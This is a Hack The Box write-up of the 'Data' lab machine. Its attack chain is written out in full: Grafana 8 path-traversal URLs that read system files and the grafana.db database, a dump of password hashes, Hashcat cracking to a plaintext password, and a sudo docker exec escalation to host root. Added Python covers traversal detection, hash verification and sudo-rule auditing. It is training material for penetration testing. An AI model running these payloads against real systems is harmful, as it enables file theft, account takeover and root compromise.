HTB-Data

HTB Data Machine Walkthrough - Complete Penetration Testing Guide

Introduction

Welcome to this comprehensive walkthrough of the Data machine from Hack The Box (HTB). In this detailed writeup, we’ll explore the complete penetration testing methodology used to compromise this Linux-based target. This HTB Data walkthrough demonstrates several critical vulnerabilities including Grafana Local File Inclusion (LFI), credential extraction, hash cracking with Hashcat, and Docker privilege escalation.

Throughout this HTB writeup, we’ll be using industry-standard tools including Nmap for reconnaissance, SQLite for database analysis, Hashcat for password cracking, and various Docker commands for privilege escalation. Whether you’re preparing for the OSCP, studying for cybersecurity certifications, or simply looking to improve your pentesting skills, this step-by-step guide will walk you through each phase of the exploitation process.

Let’s dive into this HTB Data machine walkthrough and break down the attack chain that leads to complete system compromise.


Initial Reconnaissance

Nmap Scan Results

We begin our enumeration with an Nmap scan that reveals two open ports:

22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 
3000/tcp open ppp? syn-ack ttl 62

Port 22 is running SSH, while port 3000 hosts an interesting service that warrants further investigation.


Grafana 8 Vulnerability Discovery

Identifying the Service

Upon accessing port 3000, we discover that it’s running Grafana version 8. This is a significant finding, as Grafana 8 has known vulnerabilities.

Local File Inclusion (LFI) Exploitation

Through research and referencing a bug bounty report (https://hackerone.com/reports/1427086), we identify a Local File Inclusion (LFI) vulnerability that allows us to read arbitrary files from the server.

We can exploit this vulnerability using the following path traversal technique to read /etc/passwd:

http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
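From the defensive side, this traversal is easy to spot in the web server or reverse-proxy access log: a request for a plugin asset whose decoded path climbs out of its plugin directory. The following Python script is an added example, not part of the original walkthrough or of Grafana itself. The log lines it scans are constructed here (the first carries the URL shown above, the last a double-encoded variant), and the log format is assumed to be a common/combined-style access log.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (not from the original page). Line 1 is the
# traversal request from the walkthrough; line 4 is a double-encoded variant.
SAMPLE_LOG = """\
10.10.14.5 - - [23/Jan/2022:12:50:01 +0000] "GET /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1203
10.10.14.5 - - [23/Jan/2022:12:50:02 +0000] "GET /public/plugins/mysql/img/mysql_logo.svg HTTP/1.1" 200 4481
10.10.14.5 - - [23/Jan/2022:12:50:03 +0000] "GET /login HTTP/1.1" 200 27180
10.10.14.5 - - [23/Jan/2022:12:50:04 +0000] "GET /public/plugins/alertlist/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1203
"""

# Pull the request line out of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Grafana serves plugin assets under /public/plugins/<plugin>/...
PLUGIN_ASSET_RE = re.compile(r"^/public/plugins/(?P<plugin>[^/]+)/(?P<rest>.*)$")


def fully_decode(path):
    """Percent-decode repeatedly so double-encoded sequences (%252e) normalise too."""
    for _ in range(5):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    return path


def traversal_target(path):
    """Return (plugin, decoded_path) when a plugin-asset request escapes its
    plugin directory after full decoding, otherwise None."""
    decoded = fully_decode(path.split("?", 1)[0])
    m = PLUGIN_ASSET_RE.match(decoded)
    if not m:
        return None
    # Treat backslashes as separators as well, then look for a ".." segment.
    segments = m.group("rest").replace("\\", "/").split("/")
    if ".." in segments:
        return m.group("plugin"), decoded
    return None


def scan_log(text):
    """Return (line_no, plugin, decoded_path) for every suspicious request."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = traversal_target(m.group("path"))
        if found:
            hits.append((no, found[0], found[1]))
    return hits


if __name__ == "__main__":
    for no, plugin, target in scan_log(SAMPLE_LOG):
        print(f"line {no}: plugin={plugin} target={target}")
```

Decoding before matching is the important part: a rule that only looks for the literal string `..%2F` misses the double-encoded form, while matching on the normalised path catches both. Pair a hit with the response code: a 200 on one of these requests means the file was actually served.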

Configuration File Analysis

Extracting Grafana Configuration

Next, we leverage the LFI vulnerability to access Grafana’s default configuration file:

http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Fgrafana%2Fconf%2Fdefaults.ini

Within the configuration file, we find database credentials:

# Either "mysql", "postgres" or "sqlite3", it's your choice
type = sqlite3
host = 127.0.0.1:3306
name = grafana
user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
password =
# Use either URL or the previous fields to configure the database
# Example: mysql://user:secret@host:port/database
url =

Downloading the Database

We can also download the SQLite database itself through the same LFI; on a package install Grafana keeps it at /var/lib/grafana/grafana.db:

http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db

Database Analysis and Credential Extraction

Opening the SQLite Database

With the database file downloaded, we can examine its contents using SQLite3:

sqlite3 grafana.db

Dumping User Credentials

We query the user table to extract stored credentials:

sqlite> SELECT * FROM user;
1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|boris@data.vl|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0

We now have two users: admin and boris, along with their hashed passwords and salts.


Password Hash Cracking

Converting Hash Format

To make the hashes compatible with Hashcat, we need to convert them using grafana2hashcat (https://github.com/iamaldi/grafana2hashcat).

The tool expects the hex-encoded hash and the salt on one line, separated by a comma:

dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

We run the conversion tool:

python3 grafana2hashcat.py hash

The tool returns the hash in hashcat's PBKDF2-HMAC-SHA256 format (sha256:iterations:base64 salt:base64 hash), which is what mode 10900 expects.

Cracking with Hashcat

Now we can crack the hash using Hashcat with the rockyou.txt wordlist:

hashcat -m 10900 hash2 /usr/share/wordlists/rockyou.txt

Success! The password is cracked:

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

Boris’s password is: beautiful1
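To see what grafana2hashcat is actually doing, and to confirm the result without re-running Hashcat, here is an added Python example; it is not from the walkthrough or from the grafana2hashcat project. It assumes Grafana 8's password storage scheme, PBKDF2-HMAC-SHA256 with 10,000 iterations and a 50-byte derived key stored as hex, and uses boris's hash and salt from the database dump above. verify() checks one supplied password against the stored hash, the same comparison a login performs.

```python
import base64
import hashlib
import hmac

# Hash and salt for the boris account, copied from the grafana.db dump above.
BORIS_HASH_HEX = ("dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd3"
                  "9d156be220745be3cbe49353e35f53b51da8")
BORIS_SALT = "LCBhdtJWjl"

# Assumed Grafana 8 parameters: PBKDF2-HMAC-SHA256, 10000 rounds, 50-byte key, hex output.
ITERATIONS = 10000
KEY_LEN = 50


def grafana_encode(password, salt):
    """Derive the stored hex string Grafana writes to the user table."""
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS, KEY_LEN)
    return key.hex()


def to_hashcat_10900(hash_hex, salt):
    """Rewrite (hex hash, salt) into hashcat's mode 10900 line:
    sha256:<iterations>:<base64 salt>:<base64 hash>."""
    salt_b64 = base64.b64encode(salt.encode()).decode()
    hash_b64 = base64.b64encode(bytes.fromhex(hash_hex)).decode()
    return f"sha256:{ITERATIONS}:{salt_b64}:{hash_b64}"


def verify(password, hash_hex, salt):
    """Constant-time check of a candidate password against a stored Grafana hash."""
    return hmac.compare_digest(grafana_encode(password, salt), hash_hex)


if __name__ == "__main__":
    print(to_hashcat_10900(BORIS_HASH_HEX, BORIS_SALT))
    print("beautiful1 matches:", verify("beautiful1", BORIS_HASH_HEX, BORIS_SALT))
```

The format conversion is pure re-encoding: nothing about the hash changes, which is why a leaked grafana.db is directly crackable. The 10-character random salt defeats precomputed tables, but 10,000 rounds of SHA-256 is cheap on a GPU, so a wordlist password like this one falls quickly; strong passwords and keeping the data directory unreadable are what actually protect these accounts.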


Initial Access via SSH

With valid credentials in hand, we can now establish an SSH connection to the target machine:

ssh boris@10.129.78.166

We now have user-level access to the system as boris.


Privilege Escalation

Sudo Privileges Enumeration

After gaining initial access, we check for sudo privileges:

sudo -l
Matching Defaults entries for boris on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User boris may run the following commands on localhost:
(root) NOPASSWD: /snap/bin/docker exec *

Excellent! Boris can run docker exec as root without a password. This is a critical privilege escalation vector.
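A defender auditing hosts for this class of misconfiguration can parse sudo -l output (or a sudoers export) and flag rules that amount to unrestricted root. The following Python is an added example, not from the walkthrough: it takes the sudo -l output above as input, with one extra harmless rule constructed for contrast, and the set of container runtimes it treats as root-equivalent is my own assumption.

```python
import re

# sudo -l output from the walkthrough, plus one constructed harmless rule for contrast.
SUDO_L_OUTPUT = """\
Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *
    (root) /usr/bin/systemctl restart grafana-server
"""

# "(runas) TAG: TAG: /path/to/binary arguments"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

# Assumed list: binaries that control containers and so can reach a root shell
# (docker exec --user root) and the host's block devices.
CONTAINER_RUNTIMES = {"docker", "podman", "ctr", "nerdctl"}


def parse_rules(text):
    """Extract the command rules that follow the 'User ... may run' line."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "cmd": m.group("cmd"),
                "args": m.group("args").strip(),
            })
    return rules


def assess(rule):
    """Return the reasons a rule is dangerous; an empty list means nothing flagged."""
    reasons = []
    binary = rule["cmd"].rsplit("/", 1)[-1]
    # "(root)" or "(root : root)" or "(ALL)" all reach root.
    runas_users = rule["runas"].split(":")[0].replace(" ", "").split(",")
    as_root = "root" in runas_users or "ALL" in runas_users
    if as_root and binary in CONTAINER_RUNTIMES:
        reasons.append("container-runtime")
    if "*" in rule["args"]:
        reasons.append("wildcard-args")   # sudo matches any argument string after the prefix
    if rule["nopasswd"]:
        reasons.append("nopasswd")
    return reasons


if __name__ == "__main__":
    for rule in parse_rules(SUDO_L_OUTPUT):
        flags = assess(rule) or ["ok"]
        print(f"{rule['cmd']} {rule['args']}: {', '.join(flags)}")
```

All three findings land on the docker rule and none on the pinned systemctl rule, which is the point: a sudo grant is only as narrow as its argument pattern, and a wildcard after a container runtime is root on the host, because a root shell inside a container that can see the host's block devices is one mount away from the host filesystem, as the rest of this section shows. The fix is to drop the wildcard and pin the exact command line, or not to route container access through sudo at all.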

Identifying the Root Filesystem

We run the mount command to list mounted filesystems; the relevant line of its output is:

/dev/sda1 on / type ext4 (rw,relatime)

The root filesystem is mounted on /dev/sda1, which will be important for our privilege escalation.

Finding the Docker Container

We need to identify the running Docker container:

ps auxww | grep docker

This command reveals the container ID that we’ll use in the next step.

Gaining Root Shell in Docker

Now we execute a bash shell inside the Docker container as root:

sudo docker exec -it --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash

Mounting the Host Filesystem

Once inside the container as root, we mount the host’s root filesystem:

mount /dev/sda1 /mnt/

This mounts the entire host filesystem to /mnt/ within the container, giving us access to all files on the main machine.

Capturing the Root Flag

Finally, we can read the root flag:

cat /mnt/root/root.txt

Conclusion

This HTB Data walkthrough demonstrated a complete penetration testing methodology from initial reconnaissance to root access. The attack chain involved:

  1. Reconnaissance - Nmap scanning to identify open services
  2. Vulnerability Discovery - Identifying Grafana 8 LFI vulnerability
  3. Information Gathering - Extracting configuration files and database
  4. Credential Extraction - Dumping user hashes from SQLite database
  5. Password Cracking - Using Hashcat to crack password hashes
  6. Initial Access - SSH login with cracked credentials
  7. Privilege Escalation - Exploiting Docker sudo permissions to gain root

This machine highlights the importance of proper access controls, keeping software up-to-date, and the dangers of misconfigured Docker permissions. The combination of an LFI vulnerability, weak password storage, and overly permissive sudo rules created a clear path to complete system compromise.

I hope this HTB writeup helped you understand the exploitation process. Happy hacking, and remember to always practice ethically!